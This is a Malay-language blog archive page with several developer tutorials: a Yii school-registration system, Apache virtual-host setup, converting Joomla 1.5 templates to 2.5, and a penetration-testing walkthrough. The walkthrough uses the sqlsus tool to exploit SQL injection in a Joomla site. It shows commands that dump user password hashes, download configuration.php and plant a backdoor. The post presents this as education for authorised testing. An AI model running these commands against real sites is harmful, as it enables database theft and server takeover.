Archive for the ‘tutorials’ Category

Sistem e-sman

Posted: 2 November, 2013 in tutorials

Salam semua, apa khabar korang yer. Punya lah lama aku tak berblog ni. Biasalah kan, Bz.. Bz.. Bz.. Hehehe. Macam tu lah kehidupan seorang manusia. Kalau ikutkan nak update blog ni pun takder masa sangat, tapi disebabkan nak hidupkan balik blog ni, aku update la yer. Hehehe.

Entri kali ni, nak citer serba ringkas pasal sistem yang aku tengah buat sekarang ni, Sistem Pendaftaran Tingkatan 1 Sekolah Agama Negeri Sembilan. Tak leh nak citer panjang-panjang, sebab nak sambung siapkan sistem ni. Hehehe. Sistem ni ada banyak modul dari proses permohonan pelajar, pemilihan temuduga, pemarkahan temuduga, tawaran dan macam-macam lagi, semua nak online. Huhuhu.. layankan ajer la. Aku tak dapat nak citer panjang pasal sistem ni, aku just letakkan screenshot dia saja la. Masih ada lagi modul-modul lain yang aku belum siapkan.

Login dan Pendaftaran Pengguna

Login dan Pendaftaran Pengguna

Modul Permohonan Pelajar

Modul Permohonan Pelajar

Modul Papan Pentadbir, rumusan permohonan dan tapisan awal

Modul Papan Pentadbir, rumusan permohonan dan tapisan awal

 

Modul Senarai Permohonan dipecahkan mengikut kriteria tertentu

Modul Senarai Permohonan dipecahkan mengikut kriteria tertentu

 

Senarai pemohon yang diberi markah secara automatik berdasarkan kriteria tertentu

Senarai pemohon yang diberi markah secara automatik berdasarkan kriteria tertentu

 

Modul Pemilihan Pelajar untuk panggilan temuduga

Modul Pemilihan Pelajar untuk panggilan temuduga

 

Modul Senarai Pelajar yang layak dipanggil temuduga.

Modul Senarai Pelajar yang layak dipanggil temuduga.

 

Sistem ni aku bangunkan 100% mengikut kehendak pengguna. Tiap-tiap hari Jumaat meeting dengan diorang, aduh.. pening kepala, macam-macam permintaan, tapi hasilnya diorang betul-betul komit dengan sistem ni. Alhamdulillah, satu kepuasan untuk aku. Cewah.

Ni aku kongsi code untuk paparkan bilangan di dalam CGridview

array(
'header'=>'Bil',
'value'=>'$this->grid->dataProvider->pagination->offset + $row+1',
'headerHtmlOptions'=>array('width'=>'30',),
'htmlOptions'=>array('style'=>'text-align: center'),
),

Happy h4ckin dari pokcik gh1mau πŸ™‚

201720.strip

 

Advertisements

Sistem Direktori Halal

Posted: 19 June, 2013 in tutorials

Salam semua, lama dah tak update blog ni. Kebelakangan ni aku amat sibuk dengan kerja-kerja di pejabat. Biasalahkan, keje government ni kena manipulatif, huhuhu nak buat macam mana. Tapi bila pikir balik, bila takder pengkhususan, macam mana nak lahirkan pakar dalam government ni? Hehehe. Ok lah, tak leh citer banyak bab ni.

Sekarang ni aku sibuk membangunkan sistem. Sistem terkini yang telah aku siapkan adalah Sistem Direktori Halal Negeri Sembilan. Sistem ni dibangunkan menggunakan framework yii. Aku masih lagi baru dan masih lagi belajar menggunakan framework ni, so far aku bagi two thumbs up untuk yii. Terbaik πŸ™‚

Sistem ni masih dalam fasa 1. Kalau pihak yang berkenaan minat, aku akan upgrade ke fasa 2 dengan tambahan modul-modul yang berkaitan.

Paparan muka depan sistem

Paparan muka depan sistem

Paparan pengguna awam, dilengkapi dengan fungsi carian

Paparan pengguna awam, dilengkapi dengan fungsi carian

Modul statistik dalam bentuk carta pie

Modul statistik dalam bentuk carta pie

Fungsi CRUD bagi pentadbir sistem

Fungsi CRUD bagi pentadbir sistem

Disebabkan kekangan budget kat tempat aku, jadi ada masalah nak beli server, so aku gunakan pc sebagai server. Sebelum ni aku dah buat sistem e-masjid, sistem halal ni aku kongsi server dengan emasjid. Aku setkan virtual host.

Konfigurasi virtual ip pada server.

auto eth0
iface eth0 inet static
address 10.x.x.x
netmask 255.255.255.0
network 10.x.x.0
broadcast 10.x.x.255
gateway 10.x.x.1

#konfigurasi virtual ip
auto eth0:0
iface eth0:0 inet static
address 10.x.x.y
netmask 255.255.255.0
network 10.x.x.0
broadcast 10.x.x.255
gateway 10.x.x.1

Ni pulak konfigurasi virtual host dalam apache

<VirtualHost 10.x.x.y>
ServerAdmin webmaster@example.org
ServerNameΒ  ehalal.ns.gov.my

DirectoryIndex index.php
DocumentRoot /var/www/halal/

Options -Indexes FollowSymLinks MultiViews

ErrorLog ${APACHE_LOG_DIR}/error.log
</VirtualHost>

Happy h4ckin dari pokcik gh1mau πŸ™‚

188056.strip

WAA : sqlsus

Posted: 6 May, 2013 in security tutorials, tutorials

Salam semua, entri kali ni adalah sambungan dari entri lepas, Pentesting Joomla. Ada yang tanya kat aku, ok, kita dah jumpa sql injection entry point, so lepas tu nak buat apa? Apa yang kita boleh buat adalah database enumeration dan beberapa operasi tertentu. Untuk tujuan ni, kita akan gunakan satu tool/fuzzer, nama dia sqlsus. Tool ni adalah sql injection and takeover tool, secara praktikalnya adalah lebih mudah dan cepat untuk kita buat fuzzing menggunakan tools seperti ni berbanding dengan manual testing.

Masa bila kita perlu ada kemahiran untuk manual testing? Untuk mencari entry point dan membuat POC di hadapan client. Hehehe. Bila aktiviti pen-test, takkan kita nak buat manual satu persatu, ye tak. Bila nak abis nanti πŸ™‚ Insya Allah, lain kali aku akan kongsikan secara detail asas kefahaman dan manual manipulation technique untuk tujuan sql injection ni. Perkara ni amat penting sebenarnya untuk kita develop dan extend kemahiran kita dalam sql injection.

Fungsi dan kegunaan sqlsus mysql injection and takover tool

Fungsi dan kegunaan sqlsus mysql injection and takover tool

Kita terus bincangkan function dan kegunaan sqlsus ni. Kalau korang tengok dalam rajah di atas, tu adalah function asas yang ada dalam sqlsus. Kita leh buat database enumeration, maknanya kita leh crawl maklumat dalam database, serta kita leh load file dan create file pada server dengan syarat current mysql user mempunyai file privillege.

Untuk akses tool ni aku gunakan Backtrack 5 R3, kita leh ke menu berikut: Applications->Backtrack->Exploitation Tools->Web Exploitation Tools->sqlsus

Kita perlu dapatkan injection point terlebih dahulu, untuk contoh, url berikut mempunyai kelemahan sql injection. Dan result yang dihasilkan adalah inband type(boleh rujuk dalam sqlsus documentation berkenaan dengan inband atau blind)

http://10.56.21.141/index.php?option=com_abc&view=abc&letter=AS§ionid=1

Sekarang ni kita perlu create inband configuration file bagi sqlsus dan kemudian masukkan entry point di atas sebelum kita membuat proses database enumeration. Gunakan command berikut :

./sqlsus -g inband
nano inband
#masukkan entry point pada options our $url_start =

Kemudian, runkan command berikut untuk memulakan sqlsus:

./sqlsus inband
sqlsus> start
Column enumeration, maklumat mengenai database dan versi mysql

Column enumeration, maklumat mengenai database dan versi mysql

Dapatkan table dan column structure, dengan menggunakan command berikut:

sqlsus> get databases
sqlsus> get tables
sqlsus> get columns jos_users
sqlsus> select username,password from jos_users
Dapatkan structure column dan data dari table

Dapatkan structure column dan data dari table

Sekarang ni kita cuba fungi load file dan upload file. Kita boleh load serta upload dan paparkan apa-apa fail dari server dengan menggunakan fungsi ini. Hehehe.

sqlsus> upload ghimau.txt gh1mau.txt
sqlsus> download /var/www/html configuration.php
sqlsus> backdoor
Dapatkan fail configuration.php dari target joomla

Dapatkan fail configuration.php dari target joomla

Hehehe, game over, server totally own3d! Mudah jer kan nak guna sqlsus ni, so apa lagi, try la. Hehehe. Ingat speed and precision matters the most dalam aktiviti penetration testing πŸ™‚

Rajah berikut adalah rumusan langkah-langkah untuk menggunakan sqlsus ni.

Rumusan langkah-langkah menggunakan sqlsus

Rumusan langkah-langkah menggunakan sqlsus

Perlu diingat, fuzzer ni menghasilkan lots of noise, maknanya log target akan penuh, dan IDS akan fires hundreds of alerts. Jadi gunakan tool ni pada target anda sendiri. Kalau nak buat pen-test, pastikan NDA telah ditandatangangi. πŸ™‚
Next entry insya Allah kita akan bincangkan pasal teknik asas untuk hardening Joomla.

Happy h4ckin dari pokcik gh1mau πŸ™‚

183803.strip

Salam semua, seperti yang aku cakap dalam entri lepas, kali ni kita akan tengok macam mana nak ubah template Joomla 1.5 kepada 2.5. Dalam entri yang lepas, kita dah berjaya upgrade Joomla 1.5.26 kepada Jommla 2.5.9. Masalah yang dikenalpasti adalah template lama break. Benda ni berlaku kerana structure dan coding tertentu bagi template 2.5 telah diubah.

Tanpa membuang masa, kita nengok step-step yang terlibat dalam proses ubah template ni. Terdapat 5 step asas yang perlu kita buat untuk tujuan ini :
1. Copy folder dan fail template 1.5 yang nak kita convertkan
2. Edit file structure dalam folder supaya compatible dengan Joomla 2.5
3. Edit file templateDetails.xml
4. Edit file index.php
5. Install dan uji template yang telah diconvert

Langkah 1
1. Kita copy dan rename folder template lama yang nak diconvertkan. Untuk contoh ni kita namakan folder ni template_convert_1

Folder template dalam Joomla directory

Folder template dalam Joomla directory

Langkah 2
1. Kita ubah file structure template yang dicopy tadi supaya compatible dengan file structure 2.5

Perbezaan folder structure dan fail dalam template 1.5 dengan 2.5

Perbezaan folder structure dan fail dalam template 1.5 dengan 2.5

2. Delete fail param.ini dari folder template_convert_1

3. Copy fail error.php dan template_preview.png dari folder template 2.5 (atomic) ke dalam folder template_convert_1. Nanti kita akan ubah gambar dalam fail template_preview.png

Langkah 3
1. Edit fail templateDetails.xml

2. Ubah bahagian berikut:

<install version="1.5" type="template">

kepada:

<extension version="2.5" type="template" client="site">

template3

3. Ubah tag <filename> kepada tag <folder>

template4

4. Delete declaration bagi fail params.ini

template5

5. Tambah 2 declaration baru:

<filename>error.php</filename>
<filename>template_preview.png</filename>

6. Ubah tags <param>. Ikut rule seperti table dibawah

template6

Langkah 4
1. Edit fail index.php. Tambahkan line berikut pada fail index.php

JHtml::_('behavior.framework', true);

template7

2. Ubah nama template kepada kod berikut:

<?php echo $this->template ?>

template8

Langkah 5
1. Install template baru yang telah kita convertkan tadi. Pergi ke Administrator > Extensions > Extension Manager > Discover. Kemudian tekan butang Discover. Setelah kita jumpa nama template yang telah kita convertkan, pilih untuk Install.

template9

2. Pergi ke template manager, dan setkan template_convert_1 sebagai default template. Kemudian, ujilah template baru yang dah diconvert ni.

Ok, dah selesai dah bahana convert template ni. Proses ni memang leceh. Hehehe. Insya Allah, entri akan datang, aku akan kongsikan teknik asas untuk buat Pen-Test kat site joomla πŸ™‚

Happy h4ckin dari pokcik gh1mau πŸ™‚

1780.strip